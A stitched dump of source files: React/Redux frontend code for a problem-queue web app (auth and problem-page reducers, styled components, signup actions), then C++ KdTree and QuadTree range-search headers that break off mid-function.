SET_ACTIVE_PAGE_SUCCESS: "ACTIVITY_PAGE_SET_ACTIVE_PAGE_SUCCESS",
SET_ACTIVE_PAGE_FAILED: "ACTIVITY_PAGE_SET_ACTIVE_PAGE_FAILED",
SET_USER: "ACTIVITY_PAGE_SET_USER",
RESET: "ACTIVITY_PAGE_RESET_PAGES"
}
<file_sep>/src/reducers/auth.jsx
import { authConstants } from '../constants/auth'
const token = localStorage.getItem('token')
const initialState = { token: token || token === "" ? token.replace(new RegExp('"(.*)"'),(match, x) => x) : null }
export function authReducer(state = initialState, action) {
switch (action.type) {
case authConstants.LOGIN_REQUEST:
return {
message: 'Logging in...',
messageType: action.messageType
};
case authConstants.LOGIN_SUCCESS:
return {
user: action.user,/*localStorage.getItem('user'),*/
token: action.token,
message: "Welcome",
messageType: action.messageType
};
case authConstants.LOGIN_FAILURE:
return {
user: action.user,
message: action.message,
messageType: action.messageType
};
// parse if status was 401, then print this, other set new state for server errorz
case authConstants.LOGIN_INVALID_CREDENTIALS:
return {
message: 'Invalid credentials',
messageType: action.messageType
};
case authConstants.LOGOUT:
return {
message: 'Logged out',
messageType: action.messageType
// possibly redirect here
}
case authConstants.TOKEN_VERIFY_REQUEST:
return {
user: state.user, // leave it here, then when accessing private resource, detects as logged out and redirects
token: state.token,
message: 'Re-logging in',
messageType: action.messageType
}
case authConstants.TOKEN_VERIFIED:
return {
user: action.user,
token: action.token,
message: "Logged In",
messageType: action.messageType
}
case authConstants.TOKEN_EXPIRED:
localStorage.removeItem('token')
return {
message: 'Session expired re-log in',
messageType: action.messageType,
token: state.token
}
default:
return state
}
}
<file_sep>/src/reducers/content/problemPage.jsx
import { reducer } from 'redux-form'
import { combineReducers } from 'redux'
import { problemPageConstants } from "../../constants/content/problemPage"
const defaultPaging = {
page: 0,
hasMore: true
}
const defaultState = {
submissionEntries: [
],
paging: defaultPaging,
problem: {
title:'...',
content:'...',
submitted_by: null,
active: null
},
reply: null,
submissionFormSubmitted: false
}
function problemPageReducer(state = defaultState, action) {
const findContentInEntries = (entries, contentId) => {
for (var i = 0; i < entries.length; ++i) {
if (entries[i][contentId]) {
return entries[i][contentId]
}
}
return undefined;
}
const transformEntries = (entries) => {
entries = entries ? entries : []
const transformed_entries = {}
entries.forEach(entry => {
transformed_entries[entry._id] = {...entry, _id:undefined}
})
return transformed_entries
}
const createPagingState = (submissions) => {
return submissions.map(submission => {
return ({
_id: submission._id,
page: 0,
hasMore: submission.replies.length > 0
})
})
}
const newSubmissionEntries = state.submissionEntries
const newPaging = {...state.paging}
const submission = (action.submission) ? findContentInEntries(newSubmissionEntries, action.submission) : null
switch (action.type) {
case problemPageConstants.LOAD_PROBLEM_DATA_FAILED:
return {
...state,
message: action.message,
messageType: action.messageType,
problem: undefined
}
case problemPageConstants.LOAD_REPLY_PAGE_FAILED:
case problemPageConstants.POST_SUBMISSION_FAILED:
case problemPageConstants.REPLY_SUBMISSION_FAILED:
case problemPageConstants.ACCEPT_SUBMISSION_FAILED:
return {
...state,
message: action.message,
messageType: action.messageType
}
case problemPageConstants.LOAD_PROBLEM_DATA_REQUEST:
return {
...state,
message: "Waiting for problem data",
messageType: action.messageType
}
case problemPageConstants.LOAD_PROBLEM_DATA_SUCCESS:
const keep_problem_data = action.problem && state.problem && action.problem.id === state.problem.id
return {
...state,
// has to have || {} otherwise throws error, which I dunno how to solve :D
problem: action.problem || {},
paging: keep_problem_data ? state.paging : defaultPaging,
submissionEntries: keep_problem_data ? state.submissionEntries : [],
message: "",
messageType: action.messageType
}
case problemPageConstants.LOAD_SUBMISSION_PAGE_REQUEST:
return {
...state,
message: "Loading more submissions",
messageType: action.messageType
}
case problemPageConstants.LOAD_SUBMISSION_PAGE_SUCCESS:
const activePage = (!action.activePage || action.activePage <= 1) ? 1 : action.activePage
newSubmissionEntries[activePage - 1] = transformEntries(action.data.map(x => ({...x, replyEntries: [], repliesHidden: true})))
newPaging.page = (action.data && action.data.length > 0) ? activePage : state.paging.page
newPaging.hasMore = action.hasMore
Object.assign(newPaging, transformEntries(createPagingState(action.data)))
return {
...state,
submissionEntries: newSubmissionEntries.slice(0,activePage),
paging: newPaging,
message: "",
messageType: action.messageType
}
case problemPageConstants.LOAD_SUBMISSION_PAGE_FAILED:
newPaging.hasMore = false
return {
...state,
message: action.message,
messageType: action.messageType,
paging: newPaging
}
case problemPageConstants.LOAD_REPLY_PAGE_REQUEST:
return {
...state,
message: "Loading more replies",
messageType: action.messageType
}
case problemPageConstants.LOAD_REPLY_PAGE_SUCCESS:
const activeReplyPage = (!action.activeReplyPage || action.activeReplyPage <= 1) ? 1 : action.activeReplyPage
submission.replyEntries[activeReplyPage - 1] = action.data || []
submission.replyEntries = submission.replyEntries.slice(0, activeReplyPage)
submission.repliesHidden = false
if (!newPaging[action.submission]) {
newPaging[action.submission] = {}
}
newPaging[action.submission].page = (action.data && action.data.length > 0) ? activeReplyPage : newPaging[action.submission].page
newPaging[action.submission].hasMore = action.hasMore
return {
...state,
submissionEntries: newSubmissionEntries,
paging: newPaging,
message: "",
messageType: action.messageType
}
case problemPageConstants.POST_SUBMISSION_REQUEST:
return {
...state,
message: "Posting submission",
messageType: action.messageType
}
case problemPageConstants.POST_SUBMISSION_SUCCESS:
if (newSubmissionEntries.length === 0) {
newSubmissionEntries.push({})
}
newSubmissionEntries[newSubmissionEntries.length - 1][action.submission._id] = {...action.submission, replyEntries: [], repliesHidden: true, _id:undefined}
Object.assign(newPaging, transformEntries(createPagingState([action.submission])))
return {
...state,
submissionEntries: newSubmissionEntries,
paging: newPaging,
submissionFormSubmitted: true,
message: "",
messageType: action.messageType
}
case problemPageConstants.REPLY_SUBMISSION_REQUEST:
return {
...state,
message: "Posting reply",
messageType: action.messageType
}
case problemPageConstants.REPLY_SUBMISSION_SUCCESS:
if (submission.replyEntries.length === 0) {
submission.replyEntries.push({})
}
submission.repliesHidden = false
submission.replyEntries[submission.replyEntries.length - 1][action.reply._id] = {...action.reply, _id:undefined}
return {
...state,
submissionEntries: newSubmissionEntries,
message: "",
messageType: action.messageType,
reply: null
}
case problemPageConstants.ACCEPT_SUBMISSION_REQUEST:
return {
...state,
message: 'Marking as solved',
messageType: action.messageType
}
case problemPageConstants.ACCEPT_SUBMISSION_SUCCESS:
state.problem.accepted_submission = {...submission, _id: action.submission}
return {
...state,
message: "",
messageType: action.messageType
}
case problemPageConstants.SELECT_REPLY_FORM:
return {
...state,
reply: (action.reply === state.reply) ? null : action.reply,
message: "",
messageType: action.messageType
}
case problemPageConstants.HIDE_REPLIES:
submission.repliesHidden = true
newPaging[action.submission] = defaultPaging
return {
...state,
submissionEntries: newSubmissionEntries,
paging: newPaging
}
case problemPageConstants.RESET:
return defaultState
default:
return state
}
}
export default combineReducers({
page: problemPageReducer,
form: reducer
})
<file_sep>/src/styled-components/defaults/CenteredDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { sidebarStyleConstants } from '../sidebars/Constants';
const BuzzfeedCenteredDiv = styled.div`
text-align: center;
${props => props.fullWidth && `
@media(min-width: ${sidebarStyleConstants.SIDEBAR_COLLAPSE}) {
margin-right: 16%;
}
`}
`
const TryhardCenteredDiv = props => <div {...props} fullWidth={undefined} textLeft={undefined}/>
const CenteredDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedCenteredDiv {...props} />}
tryhard={<TryhardCenteredDiv {...props} />}
/>
export default CenteredDiv<file_sep>/src/styled-components/problem/SubmissionBox.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedSubmissionBox = styled.div`
${props => props.solution && `
box-shadow: 5px 10px 18px rgba(0, 124, 30, 0.5);
border: 2px solid #0d3e00;
margin-bottom: 20px;
`}
border-radius: 10px;
padding: 8px;
margin: 10px auto 0 auto;
background-color: rgba(67, 0, 50, 0.5);
ul {
list-style-type: none;
}
`
const TryhardSubmissionBox = props => <div {...props} solution={undefined}/>
const SubmissionBox = props => <ThemeSelector
buzzfeed={<BuzzfeedSubmissionBox {...props} />}
tryhard={<TryhardSubmissionBox {...props} />}
/>
export default SubmissionBox<file_sep>/src/actions/content/signup.jsx
import { signupConstants } from '../../constants/content/signUpPage'
import { appConfig } from '../../appConfig'
import { messageType } from '../../constants/misc/backendMessageTypes'
export const signupActions = {
signup,
validateField,
reset
};
function signup(user) {
return dispatch => {
dispatch(request());
fetch(appConfig.backendUrl + "/signup", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(user)
}).then(response => {
// NOTE: refactor this
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(user => {
dispatch(success(user))
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
function request() { return { type: signupConstants.REQUEST } }
function success({user}) { return { type: signupConstants.SUCCESS, user } }
function failure(message) { return { type: signupConstants.FAILED, message, messageType: messageType.ERROR } }
}
// this const should match the const in SignUp Form
const availableFields = ['username', 'password', 'email']
function validateField(values, field) {
if (!field) {
return new Promise(resolve => resolve())
}
if (!availableFields.includes(field)) {
return new Promise((resolve, reject) => reject({[field]: 'Invalid field'}))
}
return new Promise((resolve, reject) => {
fetch(appConfig.backendUrl + "/valid/" + field, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({[field]: values[field]})
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return resolve()
}
return response.json().then(data => {
return reject({[field]: data.message})
})
})
})
}
function reset() {
return {
type: signupConstants.RESET
}
}
<file_sep>/src/styled-components/header/ThemeDropdownEntry.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedDropdownEntry = styled.li`
margin: 0px 10px 0px 10px;
font-family: Helvetica, Arial, Sans-Serif;
font-weight: bold;
div {
color: green;
}
:hover {
background-color: #e5e5e5;
color: black;
cursor: pointer;
text-decoration: underline;
}
`
//bf8000
const TryhardDropdownEntry = styled.li `
:hover {
cursor: pointer;
}
`
const DropdownEntry = props => <ThemeSelector
buzzfeed={<BuzzfeedDropdownEntry {...props} />}
tryhard={<TryhardDropdownEntry {...props} />}
/>
export default DropdownEntry<file_sep>/src/components/queue/QueueDropdown.jsx
import React from 'react';
import { Link } from "react-router-dom"
import { connect } from 'react-redux'
import { globalActions } from '../../actions/global'
import StyledQueueDropdown from '../../styled-components/sidebars/QueueDropdown'
import QueueDropdownEntries from '../../styled-components/sidebars/QueueDropdownEntries'
const mapStateToProps = state => ({
displayed: state.global.linQueuesDisplayed,
linQueues: state.global.linQueues
})
const mapDispatchToProps = dispatch => {
return {
show: () => dispatch(globalActions.showLinQueues()),
hide: () => dispatch(globalActions.hideLinQueues())
}
}
class QueueDropdown extends React.Component {
componentWillUnmount() {
if (this.props.displayed) {
this.props.hide()
}
}
render() {
return (
<div className="dropdown" >
<StyledQueueDropdown onClick={this.props.displayed ? this.props.hide : this.props.show}> Pick a Queue </StyledQueueDropdown>
{ this.props.displayed && (
<QueueDropdownEntries>
{this.props.linQueues.map((q, index) => <li key={index} value={q} onClick={() => this.props.hide()}><Link to={this.props.baseUrl + '/' + q}>{q}</Link></li>)}
</QueueDropdownEntries>
)}
</div>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(QueueDropdown)<file_sep>/src/styled-components/defaults/ButtonDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ButtonsDiv from './ButtonsDiv'
import ThemeSelector from '../ThemeSelector'
const BuzzfeedRepliesButtonsBlock = styled(ButtonsDiv)`
display: flex;
`
const TryhardRepliesButtonsBlock = props => <button {...props} />
const RepliesButtonsBlock = props => <ThemeSelector
buzzfeed={<BuzzfeedRepliesButtonsBlock {...props} />}
tryhard={<TryhardRepliesButtonsBlock {...props} />}
/>
export default RepliesButtonsBlock;
<file_sep>/src/reducers/content.jsx
import { combineReducers } from 'redux'
import signupReducer from './content/signupPage'
import loginReducer from './content/loginPage'
import forgotPwdReducer from './content/forgotPwdPage'
import queuePageReducer from './content/queuePage'
import problemPageReducer from './content/problemPage'
import statisticsReducer from './content/statistics'
import submitProblemPageReducer from './content/submitProblemPage'
import boostPageReducer from './content/boost'
import profileReducer from './content/profile'
import confirmReducer from './content/confirm'
export const contentReducer = combineReducers({
signup: signupReducer,
login: loginReducer,
forgotPwd: forgotPwdReducer,
queuePage: queuePageReducer,
problemPage: problemPageReducer,
submitProblem: submitProblemPageReducer,
boost: boostPageReducer,
statistics: statisticsReducer,
confirm: confirmReducer,
profile: profileReducer
})
<file_sep>/src/components/queue/QueuePage.jsx
import React from 'react';
//
import { connect } from 'react-redux'
import InfiniteScroll from 'react-infinite-scroller';
import { Link } from "react-router-dom"
import { queuePageActions } from '../../actions/content/queuePage'
import QueueSidebar from './QueueSidebar'
import { ProblemBox } from '../problem/ProblemBox'
import PageDiv from '../../styled-components/defaults/PageDiv'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import ProblemBoxWrapper from '../../styled-components/problem-related/ProblemBoxWrapper'
const mapStateToProps = (state, ownProps) => {
const queue = ownProps.queue
const queueState = state.content.queuePage[queue]
if (!queueState) {
return {
entries: [],
paging: {
page: 0,
hasMore: true
},
queue: queue,
queueExists: state.global.linQueues.includes(queue)
}
}
return {
entries: queueState.entries.reduce((acc, cv) => acc.concat(cv),[]),
paging: queueState.paging,
queue: queue,
loading: queueState.loading,
queueExists: state.global.linQueues.includes(queue)
}
}
const mapDispatchToProps = (dispatch, ownProps) => ({
loadPage: page => dispatch(queuePageActions.setActivePage(ownProps.queue, page)),
setActiveEntry: (page, entry) => dispatch(queuePageActions.setActiveEntry(page, entry)),
reset: () => dispatch(queuePageActions.reset(ownProps.queue))
})
class QueuePage extends React.Component {
componentWillUnmount() {
this.props.reset()
}
componentDidUpdate(prevProps){
if (prevProps.queue !== this.props.queue) {
this.props.loadPage(1)
}
}
componentDidMount() {
this.props.loadPage(1)
}
render() {
const submitProblem = (
<div>
{'Submit problem '}
<Link to={'/submitProblem?q=' + this.props.queue}>here</Link>
</div>
)
const empty = this.props.entries.length === 0
if (empty) {
return (
<PageDiv>
<QueueSidebar />
<ContentDiv sidebar>
<CenteredDiv fullWidth>
<h3>
{this.props.loading ? "Loading" : " There's nothing here"}
</h3>
{this.props.queueExists && submitProblem}
</CenteredDiv>
</ContentDiv>
</PageDiv>
)
}
/*
no need to test if queue doesnt exist, backend returns only empty array
*/
return (
<PageDiv>
<QueueSidebar />
<ContentDiv sidebar>
<CenteredDiv fullWidth>
<h3>{"Problems of queue: " + this.props.queue}</h3>
{this.props.loggedIn && submitProblem}
</CenteredDiv>
<ProblemBoxWrapper>
<InfiniteScroll
pageStart={1}
loadMore={() => {
this.props.loadPage(this.props.paging.page + 1)
}}
hasMore={this.props.paging.hasMore}
loader={<div className="loader" key={0}>Loading ...</div>}
>
<ul>
{
this.props.entries.map((p,index) => (
<li key={index}>
<ProblemBox
id={p._id}
title={p.title}
active={p.active}
created={p.created}
bounty={p.bounty}
loggedIn={this.props.loggedIn}
viewCount={p.view_count}
submissionCount={p.submissions.length}
username={p.username}
/>
</li>
))}
</ul>
</InfiniteScroll>
</ProblemBoxWrapper>
</ContentDiv>
</PageDiv>
);
}
}
export default connect(mapStateToProps, mapDispatchToProps)(QueuePage)
<file_sep>/src/reducers/content/confirm/passwordChange.jsx
import { reducer } from 'redux-form'
import { combineReducers } from 'redux'
import { confirmPasswordChangeConstants, confirmPasswordChangeStages } from '../../../constants/content/confirm/passwordChange'
function confirmPasswordChangeReducer(state={}, action) {
switch (action.type) {
case confirmPasswordChangeConstants.VERIFY_REQUEST:
return {
stage: confirmPasswordChangeStages.SUBMITTING_FORM,
message: "Verifying token sent via email",
messageType: action.messageType
}
case confirmPasswordChangeConstants.VERIFY_SUCCESS:
return {
stage: confirmPasswordChangeStages.SUBMITTING_FORM
}
case confirmPasswordChangeConstants.VERIFY_FAILED:
return {
stage: confirmPasswordChangeStages.INVALID_TOKEN,
message: "Invalid token",
messageType: action.messageType
}
case confirmPasswordChangeConstants.CONFIRM_REQUEST:
return {
stage: confirmPasswordChangeStages.SUBMITTING_FORM,
message: "Waiting for server response",
messageType: action.messageType
}
case confirmPasswordChangeConstants.CONFIRM_SUCCESS:
return {
stage: confirmPasswordChangeStages.COMPLETED,
message: "Password successfully changed",
messageType: action.messageType,
verified: true
}
case confirmPasswordChangeConstants.CONFIRM_FAILED:
return {
stage: confirmPasswordChangeStages.SUBMITTING_FORM,
message: action.message,
messageType: action.messageType,
verified: state.verified || false
}
case confirmPasswordChangeConstants.RESET:
return {
stage: confirmPasswordChangeStages.INVALID_TOKEN
}
default:
return state
}
}
const passwordChangeFormReducer = reducer;
export default combineReducers({
page: confirmPasswordChangeReducer,
form: passwordChangeFormReducer
})
<file_sep>/src/styled-components/problem-related/ProblemBoxWrapper.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { sidebarStyleConstants } from '../sidebars/Constants'
const BuzzfeedProblemBoxWrapper = styled.div`
margin-left: auto;
margin-right: auto;
width: 100%;
display: flex;
flex-wrap: wrap;
justify-content: space-between;
align-items: center;
ul {
list-style-type: none;
padding: 0;
}
li {
display: inline-block;
}
@media(max-width: ${sidebarStyleConstants.SIDEBAR_COLLAPSE}) {
display: block;
flex-wrap: nowrap;
li {
display: block;
left: -50px;
}
}
`
const TryhardProblemBoxWrapper = props => <div {...props}/>
const ProblemBoxWrapper = props => <ThemeSelector
buzzfeed={<BuzzfeedProblemBoxWrapper {...props} />}
tryhard={<TryhardProblemBoxWrapper {...props} />}
/>
export default ProblemBoxWrapper<file_sep>/src/styled-components/problem/RepliesButton.jsx
import React from 'react'
import styled from 'styled-components';
import Button from '../defaults/Button'
import ThemeSelector from '../ThemeSelector'
const BuzzfeedLoadRepliesButton = styled(Button)`
border: none;
display: inline-block;
`
const TryhardLoadRepliesButton = props => <button {...props} />
const LoadRepliesButton = props => <ThemeSelector
buzzfeed={<BuzzfeedLoadRepliesButton {...props} />}
tryhard={<TryhardLoadRepliesButton {...props} />}
/>
export default LoadRepliesButton;
<file_sep>/src/styled-components/form/ReactSelectDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedReactSelectDiv = styled.div`
margin: 10px 5px 5px 5px;
`
const TryhardReactSelectDiv = props => <div {...props}/>
const ReactSelectDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedReactSelectDiv {...props} />}
tryhard={<TryhardReactSelectDiv {...props} />}
/>
export default ReactSelectDiv | 1f634ac8871c5eda3f0970fba2ef239c2985b20b | [
"JavaScript"
] | 121 | JavaScript | koniferous22/npns-prototype-frontend | ae992267e7c259abd1756aca14dc088af700bc27 | 4f61290eba46e8e7a13bf74ac074f5a91c7841d7 |
refs/heads/master | <repo_name>abdulwahed786/node-api-demo<file_sep>/index.js
// console.log("hello world");
// var x=10;//container
// x="ksjcskjvn";
// x={ 1,2,3,4};
function add(a,b)
{
for(var x=1;x<10;x++)
console.log(a+b);
}
add(" abdiodv "," kdnvkn");<file_sep>/express.js
var express = require('express');
var app = express();
// app.listen(3000);
// console.log("server is running on port 3000");
app.listen(3000, function(req,res){
console.log("server is running on port 3000");
});
//routing HTTP GET
app.get('/', function (req,res) {
res.send('hello expressJS');
});
app.get('/health', function (req,res){
var response = { status : 'Uppp'}; //json data
res.json(response);
// res.send("welcome to health page");
});
| a5deee27739957c22548283072bf98ccc042909b | [
"JavaScript"
] | 2 | JavaScript | abdulwahed786/node-api-demo | 9448d24210d7a18c792d2170d19d981a0cf71c6f | 2f35cd5a5108a63d3a578bee39f6e018e306146d |
refs/heads/master | <file_sep>//
// KdTree.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/12/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#ifndef ChurchillNavigationChallenge_KdTree_h
#define ChurchillNavigationChallenge_KdTree_h
#include "Shared.h"
#include <algorithm>
#include <vector>
const int KD_MAX_DEPTH = 8; // Max depth of the KD tree -- stops subdividing once it reaches this depth
// A node of a 2D kd-tree over Point*.
// Interior nodes (depth < KD_MAX_DEPTH) store exactly one point — the median
// used to split — while leaf nodes at KD_MAX_DEPTH store all remaining points,
// sorted by ascending rank (see kdtree_insert).
struct KdTree {
    Rect bounds;                 // spatial region covered by this subtree
    int depth;                   // 0 at the root; split axis alternates (even = X, odd = Y)
    std::vector<Point*> points;  // median point (interior) or rank-sorted bucket (leaf)
    KdTree* left;                // child on the low side of the split; 0 if absent
    KdTree* right;               // child on the high side of the split; 0 if absent
    KdTree() : depth(0), left(0), right(0) { }
};
// Create a new KdTree node and initialize with bounds and dpeth
static KdTree* kdtree_construct(Rect bounds, int depth) {
KdTree* tree = new KdTree();
tree->depth = depth;
tree->bounds = bounds;
return tree;
}
// Delete this kdtree and it's child nodes
static void kdtree_delete(KdTree* tree) {
if (tree->left != 0) {
kdtree_delete(tree->left);
}
if (tree->right != 0) {
kdtree_delete(tree->right);
}
delete tree;
tree = 0;
}
// Method for comparing points by their rank
static inline bool kd_compare_pts_rank(const Point* p1, const Point* p2) {
return p1->rank < p2->rank;
}
// Method for comparing points by their X value
static inline bool kd_compare_pts_x(const Point* p1, const Point* p2) {
return p1->x < p2->x;
}
// Method for comparing points by their Y value
static inline bool kd_compare_pts_y(const Point* p1, const Point* p2) {
return p1->y < p2->y;
}
// Insert a vector of points into the tree
static void kdtree_insert(KdTree* tree, std::vector<Point*>& pts) {
// If we're down to one point, insert it into this leaf node
if (pts.size() == 1) {
tree->points.push_back(pts[0]);
return;
}
// If we've reached the maximum depth, add all remaining points into this leaf node and stop subdividing
if (tree->depth >= KD_MAX_DEPTH) {
for (int i = 0; i < pts.size(); i++) {
tree->points.push_back(pts[i]);
}
// Sort the points by rank so we can get the lowest ranks first when searching
std::sort(tree->points.begin(), tree->points.end(), kd_compare_pts_rank);
// Stop subdividing
return;
}
// Median index for splitting the points
const size_t median_index = pts.size() / 2;
// Select comparison method based on the depth - (even=X, odd=Y)
// Since this is a 2D kdtree, we only have 2 axes
bool (*comparator)(const Point* p1, const Point* p2);
if (tree->depth % 2 == 0)
comparator = &kd_compare_pts_x;
else
comparator = &kd_compare_pts_y;
// Reorder the points vector such that all points with an index value LEFT of the median index
// have an X or Y value (depending on depth) less than the value at the median index.
// Doesn't need to completely sort the vector, which makes it much faster for large data sets
std::nth_element(pts.begin(), pts.begin()+median_index, pts.end(), comparator);
// Add the selected median point to this tree's points vector
tree->points.push_back(pts[median_index]);
// Split the points into the left and right vectors for child noes
std::vector<Point*> left_pts = std::vector<Point*>(pts.begin(), pts.begin() + median_index);
std::vector<Point*> right_pts = std::vector<Point*>(pts.begin() + median_index + 1, pts.end());
// If there are still points on the left side then calculate the new bounds for the left child node and recursively
// add the left points down the tree
if (left_pts.size() > 0) {
Rect left_rect;
if (tree->depth % 2 == 0) {
left_rect.lx = tree->bounds.lx;
left_rect.hx = pts[median_index]->x;
left_rect.ly = tree->bounds.ly;
left_rect.hy = tree->bounds.hy;
} else {
left_rect.lx = tree->bounds.lx;
left_rect.hx = tree->bounds.hx;
left_rect.ly = tree->bounds.ly;
left_rect.hy = pts[median_index]->y;
}
tree->left = kdtree_construct(left_rect, tree->depth+1);
kdtree_insert(tree->left, left_pts);
}
// If there are still points on the right side then calculate the new bounds for the right child node and recursively
// add the riht points down the tree
if (right_pts.size() > 0) {
Rect right_rect;
if (tree->depth % 2 == 0) {
right_rect.lx = pts[median_index]->x;
right_rect.hx = tree->bounds.hx;
right_rect.ly = tree->bounds.ly;
right_rect.hy = tree->bounds.hy;
} else {
right_rect.lx = tree->bounds.lx;
right_rect.hx = tree->bounds.hx;
right_rect.ly = pts[median_index]->y;
right_rect.hy = tree->bounds.hy;
}
tree->right = kdtree_construct(right_rect, tree->depth+1);
kdtree_insert(tree->right, right_pts);
}
}
// Returns the entire subtree with no bounds checking - used when this node's
// bounds are fully contained within the search rect.
// `results` keeps at most 20 entries; `ct` counts how many pushes happened.
// NOTE(review): the priority_queue is declared without a comparator, so the
// default std::less<Point*> orders entries by POINTER VALUE, not by rank;
// results.top() is therefore not guaranteed to be the worst-ranked entry.
// The intended comparator is probably rank-based (cf. Point::operator()) -
// verify this against the callers.
static inline void kdtree_return_subtree(KdTree* tree, std::priority_queue<Point*, std::vector<Point*>>& results, int& ct) {
    for (std::vector<Point*>::iterator it = tree->points.begin() ; it != tree->points.end(); ++it) {
        if (results.size() < 20) {
            results.push(*it);
            ct++;
        }
        else if (results.top()->rank > (*it)->rank) {
            results.pop();
            results.push(*it);
            ct++;
        } else {
            // points in a max-depth leaf are sorted by ascending rank, so once
            // one fails to qualify the remaining ones cannot qualify either
            break;
        }
    }
    if (tree->left != 0) {
        kdtree_return_subtree(tree->left, results, ct);
    }
    if (tree->right != 0) {
        kdtree_return_subtree(tree->right, results, ct);
    }
}
// Depth-first recursive range search with a 2D rectangular query; qualifying
// points are accumulated into `results` (capped at 20 entries) and `ct`
// counts how many pushes happened.
static inline void kdtree_search(KdTree* tree, const Rect& query, std::priority_queue<Point*, std::vector<Point*>> & results, int& ct) {
    // If this node's bounds are fully contained within the search query
    // bounds, the whole subtree qualifies - return it without more rect tests
    if (rects_contained(query, tree->bounds)) {
        kdtree_return_subtree(tree, results, ct);
    }
    // Else, if there's an intersection between this node's bounds and the
    // search query bounds, keep searching
    else if (rects_intersect(tree->bounds, query)) {
        // Check every point stored directly in this node for containment
        // (internal nodes hold just the median point; max-depth leaves hold
        // many points, sorted by ascending rank)
        for (std::vector<Point*>::iterator it = tree->points.begin() ; it != tree->points.end(); ++it) {
            if (pt_contained(query, **it)) {
                // For this challenge, we only want the 20 points with the lowest rank value
                if (results.size() < 20) {
                    results.push(*it);
                    ct++;
                }
                else if (results.top()->rank > (*it)->rank) {
                    results.pop();
                    results.push(*it);
                    ct++;
                } else {
                    // remaining points in this node have equal-or-higher ranks
                    break;
                }
            }
        }
        // Recursively search the left node
        if (tree->left != 0)
            kdtree_search(tree->left, query, results, ct);
        // Recursively search the right node
        if (tree->right != 0)
            kdtree_search(tree->right, query, results, ct);
    }
    // else: no intersection and no containment - prune this subtree
}
#endif
<file_sep>//
// QuadTree.h
// ChurchillNavigationChallenge
//
// Created by <NAME> on 2/11/15.
// Copyright (c) 2015 ECC. All rights reserved.
//
#ifndef ChurchillNavigationChallenge_QuadTree_h
#define ChurchillNavigationChallenge_QuadTree_h
#include "Shared.h"
const int QT_MAX_PER_NODE = 32; // Maximum number of points per node before subdividing
const int QT_MAX_DEPTH = 64; // Maximum depth to allow before dumping all additional points into the leaf node
// QuadTree node struct
struct QuadTree {
    Rect bounds;             // 2D rectangular bounds of this node
    int depth;               // depth of this node in the tree (root = 0)
    QuadTree *nw;            // northwest subdivision quadrant
    QuadTree *ne;            // northeast subdivision quadrant
    QuadTree *sw;            // southwest subdivision quadrant
    QuadTree *se;            // southeast subdivision quadrant
    std::vector<Point*> pts; // points stored directly in this node
    // Initializers are listed in declaration order (nw, ne, sw, se); the
    // previous list had sw before ne, which triggers -Wreorder because members
    // are always constructed in declaration order regardless of the list.
    QuadTree() : depth(0), nw(0), ne(0), sw(0), se(0) { }
};
// Allocate a quadtree node initialized with the given bounds and depth.
// The QuadTree default constructor already nulls all four child pointers,
// so only bounds and depth need to be filled in here (the previous version
// redundantly re-assigned nw/ne/sw/se to 0).
static QuadTree* quadtree_construct(Rect bounds, int depth) {
    QuadTree* node = new QuadTree();
    node->bounds = bounds;
    node->depth = depth;
    return node;
}
// Recursively delete a quadtree node and all of its descendants.
// Safe to call with a null pointer, which also makes the per-child null
// checks of the previous version unnecessary. (The old `root = 0;` at the
// end had no effect: `root` is a by-value parameter.)
static void quadtree_delete(QuadTree* root) {
    if (root == 0)
        return;
    quadtree_delete(root->nw);
    quadtree_delete(root->ne);
    quadtree_delete(root->sw);
    quadtree_delete(root->se);
    delete root;
}
// Forward declaration of internal quadtree_insert method (below)
static bool quadtree_insert(QuadTree* node, Point* p);
// Bulk-insert helper: inserts every point in `points` into the tree rooted at
// `root`, incrementing `ct` once per attempted insertion.
// For the Churchill Navigation challenge the points arrive pre-sorted in
// ascending rank order, which guarantees the lowest-ranked nodes sit at the
// top levels of the tree when searching breadth first.
static void quadtree_insert(QuadTree* root, std::vector<Point*>& points, int& ct) {
    for (Point* p : points) {
        quadtree_insert(root, p);
        ct++;
    }
}
// Debug helper: print a quadtree node and all of its children, indented by depth.
// FIX: the previous format string passed float bounds and a size_t count
// through "%d" (undefined behavior), and used "%.*s" on a one-character
// string so the indentation never exceeded a single space.
static inline void quadtree_print(QuadTree* node) {
    printf("QT %.*s depth=%d lx=%.1f hx=%.1f ly=%.1f hy=%.1f pts=%d \n",
           node->depth, "                ",   // indent by up to 16 spaces
           node->depth, node->bounds.lx, node->bounds.hx, node->bounds.ly, node->bounds.hy,
           (int)node->pts.size());
    // quadtree_subdivide creates all four children together, so nw != 0
    // implies the siblings exist as well
    if (node->nw != 0) {
        quadtree_print(node->nw);
        if (node->ne != 0)
            quadtree_print(node->ne);
        if (node->sw != 0)
            quadtree_print(node->sw);
        if (node->se != 0)
            quadtree_print(node->se);
    }
}
// Collect every point in this node and all of its children into `results`
// without any bounds checks - used when the node's boundary is already known
// to be fully contained in the search rect. `results` holds at most 20
// entries; `ct` counts how many pushes happened.
static inline void quadtree_return_subtree(QuadTree* node, std::priority_queue<Point*, std::vector<Point*>>& results, int& ct) {
    for (size_t i = 0; i < node->pts.size(); ++i) {
        Point* candidate = node->pts[i];
        if (results.size() < 20) {
            results.push(candidate);
            ct++;
        } else if (results.top()->rank > candidate->rank) {
